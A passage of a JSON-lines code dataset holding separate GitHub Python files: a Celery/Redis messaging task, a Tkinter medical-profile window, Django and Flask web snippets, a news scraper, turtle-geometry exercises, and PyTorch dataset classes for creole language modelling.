redisdb.hmset(\"sendmsgsync:\"+sendmsgid,{\n \"openid\":openids,\n \"custid\":id,\n \"sendmsgid\":sendmsgid,\n \"campaignid\":campaignid,\n \"sendaccount\":sendaccount,\n \"wechattype\":wechattype,\n \"content\":content,\n \"task_id\":task_id,\n \"activetime\":esttime,\n \"status\":1\n })\n redisdb.lpush(\"sendmsgsync\",\"sendmsgsync:\"+sendmsgid)\n\n redisdb.hmset(listid,{\"isenable\":0,\"prepare\":1,\"queried\": times, \"downcount\": times})\n\n except Exception as e:\n print(str(e))\n redisdb.hmset(listid,{\"status\":\"STARTED\",\"error\":str(e)})\n raise\n\n\nif __name__ == \"__main__\":\n # 使用sys.argv参数运行\n # app.worker_main()\n\n # 使用自定义参数运行\n # --beat同时开启beat模式,即运行按计划发送task的实例\n # 应确保全局只有一份同样的beat\n app.worker_main([\"worker\", \"--beat\", \"--loglevel=debug\",\"-n\",\"preparesendmsg.%h\",\"-s\",\"./sche-preparesendmsg\"])","repo_name":"110273315/python-celery-rpc-mq","sub_path":"preparesendmsg.py","file_name":"preparesendmsg.py","file_ext":"py","file_size_in_byte":8773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"4912631976","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nimport tkinter.font as font\r\n\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Perfil Medico\")\r\nttk.Label(root, text=\"Perfíl medico\", padding=(30, 10)).pack()\r\nstyle = ttk.Style(root)\r\nstyle.configure(\"LargeEntry.TEntry\", font=(\"Segoe UI\", 15))\r\nfont.nametofont(\"TkDefaultFont\").configure(size=15)\r\nNombre=\"Harola Angeles \"\r\nEdad=\"19\"\r\nPeso=\"45\"\r\nTalla=\"1.5\"\r\nMdg=\"2do mes\"\r\nEnfermedad_c=\"Diabetes\"\r\nEnfermedad_nc=\"Ninguna\"\r\n\r\n\r\n#nombre\r\nNombre_frame=ttk.Frame(root, padding=(20,10,20,0))\r\nNombre_frame.pack(fill=\"both\")\r\nttk.Label(Nombre_frame, text=f\"Nombre: {Nombre} \", padding=(30, 10)).pack(side=\"left\")\r\n#edad\r\nEdad_frame=ttk.Frame(root, padding=(20,10,20,0))\r\nEdad_frame.pack(fill=\"both\")\r\nttk.Label(Edad_frame, text=f\"Edad: {Edad} años\", padding=(30, 10)).pack(side=\"left\")\r\n#peso\r\nttk.Label(Edad_frame, text=f\"Peso: {Peso} kg\", padding=(30, 10)).pack(side=\"left\")\r\n#Talla\r\nttk.Label(Edad_frame, text=f\"Talla: {Talla} m\", padding=(30, 10)).pack(side=\"left\")\r\n#Mes de gestacion\r\nMdg_frame=ttk.Frame(root, padding=(20,10,20,0))\r\nMdg_frame.pack(fill=\"both\")\r\nttk.Label(Mdg_frame, text=f\"Mes de gestación: {Mdg}\", padding=(30, 10)).pack(side=\"left\")\r\n#Enfermedad adicional\r\nEnfermedadA_frame=ttk.Frame(root, padding=(20,10,20,0))\r\nEnfermedadA_frame.pack(fill=\"both\")\r\nttk.Label(EnfermedadA_frame, text=f\"Enfermedad considerable: {Enfermedad_c}\", padding=(30, 10)).pack(side=\"left\")\r\n#Enfermedad no considerable\r\nEnfermedadnc_frame=ttk.Frame(root, padding=(20,10,20,0))\r\nEnfermedadnc_frame.pack(fill=\"both\")\r\nttk.Label(Enfermedadnc_frame, text=f\"Enfermedad no considerable: {Enfermedad_nc}\", padding=(30, 10)).pack(side=\"left\")\r\n#Botones\r\nbotones_frame=ttk.Frame(root, padding=(20,10,20,0))\r\nbotones_frame.pack(fill=\"both\")\r\nboton_editar =ttk.Button(botones_frame, text=\"Editar\").pack(side=\"left\")\r\nboton_atras =ttk.Button(botones_frame, text=\"Atras\", command=root.destroy).pack(side=\"right\")\r\n\r\nroot.mainloop()","repo_name":"Grupo13BIODI/Grupo13BIODI.github.io","sub_path":"Codigos/Interfaz grafica/Perfil_medico.py","file_name":"Perfil_medico.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"21250110179","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\napp_name = 'index'\r\nurlpatterns = [\r\n path('', views.index, name='main'),\r\n path('login/', views.login, name='login'),\r\n path('logout/', views.logout, name='logout'),\r\n path('signup/', views.sign_up, name='signup'),\r\n path('new/\"+\\\n \"click here to log out\"\n return \"You are not logged in
\"+\\\n \"click here to log in\"\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method==\"POST\":\n session[\"username\"]=request.form[\"username\"]\n return redirect(url_for(\"index\"))\n return \"\"\"\n \n \"\"\"\n\n@app.route(\"/logout\")\ndef logout():\n #유저가 세션 안에 있으면 삭제한다.\n session.pop(\"username\", None)\n return redirect(url_for(\"index\"))\n\nif __name__ ==\"__main__\":\n app.run(debug=True)","repo_name":"jjkim110523/flask_tutorial","sub_path":"flask_Sessions/flask_session.py","file_name":"flask_session.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5096339988","text":"import datetime\n\nimport bs4\nimport requests\n\nfrom datasources.date_format import get_date\nfrom main import rq\n\n\n@rq.job(timeout=600)\ndef get_all_news(url):\n res = requests.get(url)\n soup = bs4.BeautifulSoup(res.text, \"html.parser\")\n images = soup.find_all('img', {'class': 'newslist__image'})\n news_link = soup.find_all('a', {'class': 'newslist__link'})\n links = []\n for i in news_link:\n link = i.attrs['href']\n link = link.strip('/press/news/')\n links.append(link)\n news_list = []\n i = 0\n for link in links:\n article = get_article(url, link)\n article.append(images[i].attrs['src'])\n news_list.append(article)\n i += 1\n return news_list\n\n\ndef get_article(url, link):\n result = requests.get(f'{url}{link}')\n soup = bs4.BeautifulSoup(result.text, \"html.parser\")\n title = soup.select('h1.pagetitle__content-title')\n pub_date = soup.select('div.pagetitle__content-date')\n article_data = []\n if len(pub_date) > 0:\n date_str = pub_date[0].getText()\n date_formatted = get_date(date_str)\n article_data.append(title[0].getText())\n article_data.append(date_formatted)\n now = datetime.datetime.now()\n article_data.append(now.strftime(\"%d-%m-%Y %H:%M\"))\n return article_data\n","repo_name":"helen-spring/metro-news","sub_path":"datasources/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3130202761","text":"import numpy as np\r\n\r\ntimers = list(np.loadtxt(\"input_test.txt\", delimiter=\",\", dtype=int))\r\n\r\nfor day in range(18):\r\n n = len(timers)\r\n for i in range(n):\r\n if timers[i] == 0:\r\n timers.append(8)\r\n timers[i] = 6\r\n else:\r\n timers[i] -= 1\r\n \r\nprint(len(timers))\r\n","repo_name":"ardiloot/aoc_2021","sub_path":"06/task_a.py","file_name":"task_a.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36427426349","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.views import View\n\nfrom goods.models import *\nfrom django.core.paginator import Paginator\nimport math\n\n\nclass IndexView(View):\n def get(self, request, cid=2, num=1):\n\n cid = int(cid)\n num = int(num)\n\n # 查询所有类别信息\n categorys = Category.objects.all().order_by('id')\n\n # 查询当前类别下的所有商品信息\n goodsList = Goods.objects.filter(category_id=cid).order_by('id')\n\n # 分页(每页显示八条记录)\n pager = Paginator(goodsList, 8)\n\n # 获取当前页的数据\n page_goodsList = pager.page(num)\n\n # 每页开始页码\n begin = (num - int(math.ceil(10.0 / 2)))\n if begin < 1:\n begin = 1\n\n # 每页结束页码\n end = begin + 9\n if end > pager.num_pages:\n end = pager.num_pages\n\n if end <= 10:\n begin = 1\n else:\n begin = end - 9\n\n pagelist = range(begin, end + 1)\n\n return render(request, 'index.html',\n {'categorys': categorys, 'goodsList': page_goodsList, 'currentCid': cid, 'pagelist': pagelist,\n 'currentNum': num})\n","repo_name":"fbozhang/python","sub_path":"shop/goods/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"22"} +{"seq_id":"14113413582","text":"from proxy.txt_reader import TxtReader\n\n\nclass TxtProxyWriterReader:\n def __init__(self, file_path):\n self.__result = ''\n self.__is_actual = False\n self.__txt_reader = TxtReader(file_path)\n\n def read_file(self):\n if self.__is_actual:\n return self.__result\n else:\n self.__result = self.__txt_reader.read()\n self.__is_actual = True\n return self.__result\n\n\nif __name__ == '__main__':\n proxy_reader = TxtProxyWriterReader('my_file.txt')\n\n print(proxy_reader.read_file())\n print('\\n')\n print(proxy_reader.read_file())\n","repo_name":"bohdandovbsyh/patterns_example","sub_path":"proxy/txt_proxy_writer_reader.py","file_name":"txt_proxy_writer_reader.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"17015842886","text":"from turtle import *\n\n# carré\nfor i in range(4):\n forward(40)\n right(90)\n\n\nclear()\n\n# fonction carré\ndef carré():\n for i in range(4):\n forward(40)\n right(90)\n\ncarré()\nclear()\n\n# panneau\ndef panneau():\n forward(60)\n left(45)\n carré()\n right(45)\n backward(60)\n\npanneau()\nclear()\n\n# étoile à 8 branches\ndef étoile8():\n for i in range(8):\n panneau()\n left(360/8)\n \nétoile8()\nclear()\n\n# étoile à 11 branches\ndef étoile11():\n for i in range(11):\n panneau()\n left(360/11)\n \nétoile11()\nclear()\n\n# étoile quelconque\ndef étoile(n):\n for i in range(n):\n panneau()\n left(360/n)\n \nétoile(20)\nclear()\n\n# carré de taille quelconque\ndef carré(c):\n for i in range(4):\n forward(c)\n right(90) \n\ncarré(20)\nclear()\n\n# croix\ndef branche():\n taille = 100\n for i in range(5):\n carré(taille)\n forward(taille)\n taille -= 20\n backward(100 + 80 + 60 + 40 + 20)\n\ndef croix():\n for i in range(4):\n branche()\n left(90)\n\ncroix()\nclear()\n\n# triangle\ndef triangle(c):\n for i in range(3):\n forward(c)\n left(120)\n \ntriangle(100)\nclear()\n\n# heptagone\ndef heptagone(c):\n for i in range(7):\n forward(c)\n left(360/7)\n\nheptagone(100)\nclear()\n\n# polygone\ndef polygone(n, c):\n for i in range(n):\n forward(c)\n left(360/n)\n \npolygone(20, 50)\nclear()\n\n# ligne de polygones croissants\npenup()\ngoto(-200, 0)\npendown()\n\nfor i in range(3, 11):\n polygone(i, 40)\n forward(40)\n \nclear()\n\n# rosace d'octogones\ndef rosace8(c):\n for i in range(8):\n polygone(8, c)\n right(360/8)\n\nrosace8(50)\nclear()\n\n# rosace quelconque\ndef rosace(n, c):\n for i in range(n):\n polygone(n, c)\n right(360/n)\n\nrosace(20, 30)\nclear()\n\n# rosace en couleurs\ndef rosace_couleurs(n, c):\n couleurs = [\"black\", \"green\", \"blue\", \"red\", \"brown\", \"purple\", \"orange\", \"pink\"]\n for i in range(8):\n pencolor(couleurs[i])\n polygone(n, c)\n right(360/n)\n\nrosace_couleurs(8, 50)\nclear()\n\n# rosace en dégradé\ndef rosace_degrade(n, c):\n d = 0\n for i in range(n):\n pencolor((1-d, 0, d))\n polygone(n, c)\n right(360/n)\n d += 1/n\n\nrosace_degrade(8, 50)\nclear()\n\n# rosace pleine\ndef rosace_pleine(n, c):\n d = 0\n for i in range(n):\n fillcolor((1-d, 0, d))\n begin_fill()\n polygone(n, c)\n end_fill()\n right(360/n)\n d += 1/n\n \nrosace_pleine(8, 50)\nclear()\n\n# triangles emboites\ndef triangles_emboités(c):\n penup()\n goto(-100, -100)\n pendown()\n taille = c\n while taille >= 1:\n triangle(taille)\n forward(taille/2)\n left(60)\n taille /= 2\n\ntriangles_emboités(300)\nclear()\n\n# spirale\ndef spirale():\n d = 0.01\n for i in range(600):\n forward(d)\n right(5)\n d += 0.01\n \nspirale()\nclear()\n\n# spirale carrée\ndef spirale_carre(n):\n taille = 10\n for i in range(n):\n forward(taille)\n right(90)\n taille += 5\n\nspirale_carre(20)\nclear()\n\n# spirale polygonale\ndef spirale_polygone(n, m):\n taille = 10\n for i in range(n):\n forward(taille)\n right(360 / m)\n taille += 5\n\nspirale_polygone(20, 6)\nexitonclick()","repo_name":"estelledoriot/Turtle_geometrie","sub_path":"geometrie.py","file_name":"geometrie.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26287683691","text":"import os\nimport re\nimport string\nimport spacy\nimport json\nimport random\nimport pandas as pd\nfrom collections import defaultdict\n\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom transformers import Trainer, TrainingArguments\nfrom transformers import BertForMaskedLM, AdamW, BertConfig\nfrom transformers.data.data_collator import DataCollatorForLanguageModeling\n\nimport en_core_web_sm\n\n# ==================================================================================================================== #\n# Data utils #\n# ==================================================================================================================== #\n\ndef split_sents(base_language, text_lines):\n \"\"\"\n :param base_language: \"en\" or \"fr\" for English or French\n :param text_lines: list['sentences', 'sentences']\n :return: list['sent', 'sent', 'sent']\n \"\"\"\n\n sentences = []\n\n if base_language == \"en\":\n nlp = en_core_web_sm.load() # spacy.load(\"en_cor_web_sm\")\n for text in text_lines:\n doc = nlp(text.strip())\n [sentences.append(s.text) for s in doc.sents]\n\n if base_language == \"fr\":\n for text in text_lines:\n [sentences.append(s.strip()) for s in re.split(\"\\s\\.\\s\", text)]\n #for s in re.split(\"\\s\\.\\s\", text):\n # clean_s = clean_sent(s)\n sentences = [s for s in sentences if s.strip() != \"\"]\n\n return sentences\n\n\ndef get_max_length(sentences, tokenizer):\n \"\"\"\n Get the max length for padding sentences\n :param sentences: list of sentences\n :return: max length of sentences\n \"\"\"\n max_len = 0\n for sent in sentences:\n input_ids = tokenizer.encode(sent, add_special_tokens=True)\n max_len = max(max_len, len(input_ids))\n print(f\" Max sent length: {max_len}\")\n return max_len\n\n\ndef tokenize_data(sentences, tokenizer, max_len):\n input_ids = []\n attention_masks = []\n for sent in sentences:\n encoded_dict = tokenizer.encode_plus(sent, add_special_tokens=True, max_length=max_len, pad_to_max_length=True,\n return_attention_mask=True, return_tensors='pt')\n input_ids.append(encoded_dict['input_ids'])\n attention_masks.append(encoded_dict['attention_mask'])\n # Convert the lists into tensors\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n # Print sentence 0, now as a list of IDs.\n print('Original: ', sentences[0])\n print('Token IDs:', input_ids[0])\n\n return input_ids, attention_masks\n\n\n# ==================================================================================================================== #\n# Baseline #\n# ==================================================================================================================== #\n\nclass CreoleDataset(Dataset):\n def __init__(self, src_file, tokenizer, base_language=\"en\", nexamples=-1, evaluate=False):\n with open(src_file, \"r\", encoding=\"utf-8\") as input_file:\n entries = input_file.readlines()[:nexamples]\n\n self.base_language = base_language\n\n self.sentences = split_sents(base_language, entries)\n print(f\"NUMBER OF SENTENCES: {len(self.sentences)}\")\n self.max_len = get_max_length(self.sentences, tokenizer)\n input_ids, attention_masks = tokenize_data(self.sentences, tokenizer, self.max_len)\n\n self.examples = input_ids\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n return torch.tensor(self.examples[i])\n\nclass CreoleJsonDataset(Dataset):\n def __init__(self, src_file, tokenizer, base_language=\"en\", nexamples=-1, evaluate=False, creole_only=False):\n with open(src_file, \"r\", encoding=\"utf-8\") as input_file:\n entries = json.load(input_file)[:nexamples] #list of dicts\n\n self.base_language = base_language\n\n self.sentences = []\n for subdict in entries:\n for sent, lang in subdict.items():\n if not creole_only:\n self.sentences.append(sent)\n else: #if we are only looking at creole-only (for evaluation) skip the other examples in the file.\n if lang in [\"singlish\", \"naija\", \"haitian\"]:\n self.sentences.append(sent)\n\n print(f\"NUMBER OF SENTENCES: {len(self.sentences)}\")\n self.max_len = 128 #get_max_length(self.sentences, tokenizer)\n input_ids, attention_masks = tokenize_data(self.sentences, tokenizer, self.max_len)\n\n self.examples = input_ids\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n return torch.tensor(self.examples[i])\n\nclass SinglishSMSDataset(Dataset):\n def __init__(self, src_file, tokenizer, base_language=\"en\", nexamples=-1, evaluate=False):\n with open(src_file, \"r\") as input_file:\n corpus_json = json.load(input_file)\n\n self.base_language = base_language\n self.sentences = []\n for message in corpus_json['smsCorpus']['message']:\n sent = str(message['text']['$']).strip(\"\\n\")\n if \"\\n\" not in sent:\n self.sentences.append(sent)\n #self.sentences.append(str(message['text']['$']))\n\n print(f\"NUMBER OF SENTENCES: {len(self.sentences)}\")\n self.max_len = get_max_length(self.sentences, tokenizer)\n input_ids, attention_masks = tokenize_data(self.sentences, tokenizer, self.max_len)\n\n self.examples = input_ids\n\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n #return torch.tensor(self.examples[i])\n #recommended by pytorch\n return self.examples[i].clone().detach()#.requires_grad_(True)\n\nclass NaijaUDDataset(Dataset):\n def __init__(self, src_dir, tokenizer):\n\n self.base_language = \"en\"\n self.sentences = []\n\n filenames = [f for f in os.listdir(src_dir) if f.endswith(\".conllu\")]\n for f in filenames:\n with open(os.path.join(src_dir, f), \"r\") as input:\n lines = input.readlines()\n for line in lines:\n if line.startswith(\"# text_ortho\"):\n clean_line = line[15:].strip() # take off '# text_ortho = ':\n self.sentences.append(clean_line)\n\n #FIXME: can not evaluate perplexity if we load the whole dataset\n # extended_path = os.path.join(path, \"non_gold\")\n # more_filenames = [f for f in os.listdir(extended_path) if f.endswith(\".conllu\")]\n # for f in more_filenames:\n # with open(os.path.join(extended_path, f), \"r\") as input:\n # lines = input.readlines()\n # for line in lines:\n # if line.startswith(\"# text_ortho\"):\n # clean_line = line[15:].strip()\n # sentences.append(clean_line)\n\n print(f\"NUMBER OF SENTENCES: {len(self.sentences)}\")\n self.max_len = get_max_length(self.sentences, tokenizer)\n print(f\"MAX SENTENCE LENGTH: {self.max_len}\")\n input_ids, attention_masks = tokenize_data(self.sentences, tokenizer, self.max_len)\n\n self.examples = input_ids\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n return torch.tensor(self.examples[i])\n\nclass SinglishUDDataset(Dataset):\n def __init__(self, src_dir, tokenizer):\n self.base_language = \"en\"\n self.sentences = []\n\n files = [\"train.conll\", \"dev.conll\", \"test.conll\"]\n\n for f in files:\n full_path = os.path.join(src_dir, f)\n with open(full_path, \"r\") as indata:\n lines = indata.readlines()\n\n stack = []\n for line in lines:\n if line != \"\\n\":\n elems = line.split(\"\\t\")\n token = elems[1]\n stack.append(token)\n if line == \"\\n\":\n sent = \" \".join(stack)\n self.sentences.append(sent)\n stack = []\n print(f\"NUMBER OF SENTENCES: {len(self.sentences)}\")\n self.max_len = get_max_length(self.sentences, tokenizer)\n print(f\"MAX SENTENCE LENGTH: {self.max_len}\")\n input_ids, attention_masks = tokenize_data(self.sentences, tokenizer, self.max_len)\n\n self.examples = input_ids\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n return torch.tensor(self.examples[i])\n\n\nclass HaitianEvalDatasets(Dataset):\n def __init__(self, src_dir, tokenizer):\n self.base_language = \"fr\"\n self.sentences = []\n\n # files = [\"1600_medical_domain_sentences.ht\", \"glossary-all-fix.ht\", \"newswire-all.ht\"]\n # for f in files:\n # full_path = os.path.join(src_dir, f)\n # with open(full_path, \"r\") as indata:\n # lines = indata.readlines()\n # for line in lines: #clean out examples length 1?\n # if len(line.split(\" \")) > 1:\n # self.sentences.append(line.strip(\"\\n\")) #already in sentences\n\n #evaluating haitian datasets sepperately ... >_>\n with open(src_dir, \"r\") as indata:\n lines = indata.readlines()\n for line in lines: #clean out examples length 1?\n if len(line.split(\" \")) > 1:\n self.sentences.append(line.strip(\"\\n\")) #already in sentences\n print(f\"NUMBER OF SENTENCES: {len(self.sentences)}\")\n self.max_len = get_max_length(self.sentences, tokenizer)\n print(f\"MAX SENTENCE LENGTH: {self.max_len}\")\n input_ids, attention_masks = tokenize_data(self.sentences, tokenizer, self.max_len)\n\n self.examples = input_ids\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n return torch.tensor(self.examples[i])\n\nclass NaijaMasakhaneNERDataset(Dataset):\n def __init__(self, src_dir, tokenizer):\n self.base_language = \"en\"\n self.sentences = []\n\n files = [\"train.txt\", \"dev.txt\", \"test.txt\"]\n for f in files:\n full_path = os.path.join(src_dir, f)\n with open(full_path, \"r\") as indata:\n lines = indata.readlines()\n\n stack = []\n for l in lines:\n if l != \"\\n\":\n elems = l.split(\" \")\n token = elems[0]\n if token not in ['\"\"\"\"']:\n stack.append(token)\n if l == \"\\n\":\n self.sentences.append(\" \".join(stack))\n stack = []\n\n print(f\"NUMBER OF SENTENCES: {len(self.sentences)}\")\n self.max_len = get_max_length(self.sentences, tokenizer)\n print(f\"MAX SENTENCE LENGTH: {self.max_len}\")\n input_ids, attention_masks = tokenize_data(self.sentences, tokenizer, self.max_len)\n\n self.examples = input_ids\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n return torch.tensor(self.examples[i])\n\n\n# ==================================================================================================================== #\n# WILDS #\n# ==================================================================================================================== #\nclass CreoleDatasetWILDS(Dataset):\n def __init__(self, base_dataset, tokenizer, group_strategy, group_file, creole, evaluate: bool = False):\n\n self.base_language = base_dataset.base_language\n self.creole = creole\n self.sentences = base_dataset.sentences\n self.max_len = base_dataset.max_len\n self.examples = base_dataset.examples\n\n self.y_size = base_dataset.examples.shape[1]\n\n self.is_classification = False\n\n #Input: self.sentences\n #Output: {metadata_df, identity_vars, metadata_array, metadata_fields, metadata_map}\n if group_strategy==\"collect\":\n self.metadata_df, self.identity_vars, self.metadata_array, self.metadata_fields, self.metadata_map = self.collect(sentences=self.sentences, group_file=group_file, creole=self.creole)\n #elif group_strategy==\"cluster\":\n # self.metadata_df, self.identity_vars, self.metadata_array, self.metadata_fields, self.metadata_map = self.cluster(sentences=self.sentences, group_file=group_file)\n #elif group_strategy==\"percent\":\n # self.metadata_df, self.identity_vars, self.metadata_array, self.metadata_fields, self.metadata_map = self.percent_base(sentences=self.sentences,group_file=group_file, base_language=self.base_language)\n elif group_strategy==\"language\": #a non-naive implementation of \"collect\"\n self.metadata_df, self.identity_vars, self.metadata_array, self.metadata_fields, self.metadata_map = self.language(sentences=self.sentences, group_file=group_file, creole=self.creole)\n elif group_strategy==\"random\":\n self.metadata_df, self.identity_vars, self.metadata_array, self.metadata_fields, self.metadata_map = self.random_groups(sentences=self.sentences)\n elif group_strategy==\"one\":\n self.metadata_df, self.identity_vars, self.metadata_array, self.metadata_fields, self.metadata_map = self.one_group(sentences=self.sentences)\n else:\n print(\"The grouping strategy that you tried to use does not exist\")\n raise NotImplementedError\n\n\n ##### extracting the y's, because WILDS-compatible data objects need this #####\n data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm=True, mlm_probability=0.15)\n temp_training_args = TrainingArguments(\n output_dir=\"./dummy\",\n overwrite_output_dir=True,\n num_train_epochs=1,\n per_gpu_train_batch_size=1,\n save_steps=10_000,\n save_total_limit=2,\n prediction_loss_only=True,\n )\n temp_trainer = Trainer(\n model=BertForMaskedLM.from_pretrained('bert-base-uncased'),\n args=temp_training_args,\n data_collator=data_collator,\n train_dataset=base_dataset\n )\n temp_loader = temp_trainer.get_train_dataloader()\n\n self.temp_xs = []\n self.temp_ys = []\n for batch in temp_loader:\n self.temp_xs.append(batch[\"input_ids\"])\n self.temp_ys.append(batch[\"labels\"])\n\n self.temp_xs = torch.cat(self.temp_xs)\n self.temp_ys = torch.cat(self.temp_ys)\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n x = self.temp_xs[i]\n y = self.temp_ys[i]\n metadata = self.metadata_array[i]\n return x, y, metadata\n\n def collect(self, sentences, group_file, creole):\n creole_LUT = {\"singlish\": [\"en\", \"zh\", \"ms\", \"ta\"],\n \"haitian\": [\"fr\", \"yo\", \"es\"],\n \"naija\": [\"en\", \"yo\", \"pt\"]}\n\n sub_language_keys = creole_LUT[creole]\n columns = [\"x\"] + sub_language_keys\n\n dfdata_default = defaultdict(list)\n\n with open(group_file, 'r', encoding=\"utf-8\") as input_file:\n sentence_dict = json.loads(input_file.read())\n\n for sent, sent_dict in zip(sentences, sentence_dict):\n dfdata_default[\"x\"].append(sent)\n for s, language_dict in sent_dict.items():\n #print(f\"sent_dict is {sent_dict} (type({type(sent_dict)}))\")\n #print(f\"sent: {sent} is type {type(sent)}\")\n #language_dict = sentence_dict[sent]\n #dfdata_default[\"x\"].append(sent)\n assert sent == s\n\n for sub in sub_language_keys:\n score = language_dict[sub]\n dfdata_default[sub].append(score)\n\n dfdata = dict(dfdata_default)\n\n metadata_df = pd.DataFrame(dfdata, columns=columns)\n print(metadata_df.head)\n\n identity_vars = sub_language_keys\n metadata_fields = sub_language_keys\n\n metadata_array = torch.LongTensor((metadata_df.loc[:, identity_vars] >= .001).values) #if its at least 1%, then yes. otherwise no. \n\n metadata_map = {} #so... I could get all the unique values and say 0=no, and anything else=yes\n #to save for space, maybe we wanna round to 2 decimals :/ No, because it looks like the predictions are soooo low shewlkarj.\n for lang in sub_language_keys:\n metadata_map[lang] = [\"percent\"]\n #metadata_map[lang] = [\"true\" for i in list(set(dfdata[lang])) if i > 0 else 1] <--- Nervous we MIGHT need something like this?\n #TODO: debug with grouper.py to see if this metadata_map is important\n return metadata_df, identity_vars, metadata_array, metadata_fields, metadata_map\n\n def language(self, sentences, group_file, creole):\n creole_LUT = {\"singlish\": [\"singlish\", \"en\", \"zh\", \"ta\", \"ms\"], #TODO: is this too many groups?\n \"haitian\": [\"haitian\", \"fr\", \"yo\", \"es\"],\n \"naija\": [\"naija\", \"en\", \"yo\", \"pt\"]}\n\n sub_language_keys = creole_LUT[creole]\n\n columns = [\"x\", \"language\"]\n dfdata= {\"x\": [], \"language\": []}\n\n with open(group_file, 'r', encoding=\"utf-8\") as input_file:\n sentence_dict = json.loads(input_file.read())\n\n\t\n for sent, sent_dict in zip(sentences, sentence_dict):\n language = sent_dict[sent] #FIXME this is kludgy but we want to make sure the sentences are in the same order so if this fails we'll know\n dfdata[\"x\"].append(sent)\n idx = sub_language_keys.index(language) #+ 1\n dfdata[\"language\"].append(idx)\n\n metadata_df = pd.DataFrame(dfdata, columns=columns)\n print(metadata_df.head)\n\n identity_vars = columns[1:]\n metadata_fields = columns[1:]\n\n metadata_array = torch.LongTensor((metadata_df.loc[:, identity_vars]).values)\n sub_language_idxs = [i for i in range(0, len(sub_language_keys)+1)]\n metadata_map = {\"language\": sub_language_keys}\n\n return metadata_df, identity_vars, metadata_array, metadata_fields, metadata_map\n\n def cluster(self, sentences, group_file):\n\n columns = [\"x\", \"cluster\"]\n dfdata= {\"x\": [], \"cluster\": []}\n\n with open(group_file, 'r', encoding=\"utf-8\") as input_file:\n sentence_dict = json.loads(input_file.read())\n\n for i, sent in enumerate(sentences):\n dfdata[\"x\"].append(sent)\n dfdata[\"cluster\"].append(sentence_dict[sent][\"cluster\"])\n\n metadata_df = pd.DataFrame(dfdata, columns=columns)\n print(metadata_df.head)\n\n identity_vars = columns[1:]\n metadata_fields = columns[1:]\n\n metadata_array = torch.LongTensor((metadata_df.loc[:, identity_vars]).values)\n metadata_map = {\"cluster\": [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\"]}\n\n return metadata_df, identity_vars, metadata_array, metadata_fields, metadata_map\n\n def percent_base(self, sentences, group_file, base_language):\n columns = [\"x\", base_language]\n\n # init dfdata\n #dfdata = {\"x\": sentences, base_language: []}\n\n dfdata_default = defaultdict(list)\n\n with open(group_file, 'r', encoding=\"utf-8\") as input_file:\n sentence_dict = json.loads(input_file.read())\n\n for sent in sentences:\n language_dict = sentence_dict[sent]\n dfdata_default[\"x\"].append(sent)\n dfdata_default[base_language].append(language_dict[base_language])\n\n dfdata = dict(dfdata_default)\n\n metadata_df = pd.DataFrame(dfdata, columns=columns)\n print(metadata_df.head)\n\n identity_vars = [base_language]\n metadata_fields = [base_language]\n\n metadata_array = torch.LongTensor((metadata_df.loc[:, identity_vars] >= .001).values)\n\n metadata_map = {base_language: [\"percent\"]} #TODO: also need to see if this metadata_map is problematic\n\n return metadata_df, identity_vars, metadata_array, metadata_fields, metadata_map\n\n def random_groups(self, sentences):\n #Here is a random example of Grouping\n\n #### making up metadata #####\n dfdata = {'x': sentences,\n 'group1': [random.choice([0, 1]) for r in range(0, len(sentences))],\n 'group2': [random.choice([0, 1]) for r in range(0, len(sentences))]}\n\n metadata_df = pd.DataFrame(dfdata, columns=['x', 'group1', 'group2'])\n print(metadata_df.head)\n\n # identity vars need to be present in the df\n identity_vars = [\n 'group1',\n 'group2'\n ]\n\n metadata_array = torch.LongTensor((metadata_df.loc[:, identity_vars] >= 0.5).values)\n metadata_fields = ['group1', 'group2']\n metadata_map = {'group1': ['no', 'yes'],\n 'group2': ['no', 'yes']} # 0=no, 1=yes. What the number values for the metadata map to\n\n return metadata_df, identity_vars, metadata_array, metadata_fields, metadata_map\n\n def one_group(self, sentences):\n #Assign everything the same thing, for a DRO baseline.\n\n #### making up metadata #####\n dfdata = {'x': sentences,\n 'group1': [0 for r in range(0, len(sentences))]}\n\n metadata_df = pd.DataFrame(dfdata, columns=['x', 'group1'])\n print(metadata_df.head)\n\n # identity vars need to be present in the df\n identity_vars = ['group1']\n\n metadata_array = torch.LongTensor((metadata_df.loc[:, identity_vars] >= 0.5).values)\n metadata_fields = ['group1']\n metadata_map = {'group1': ['yes']} # 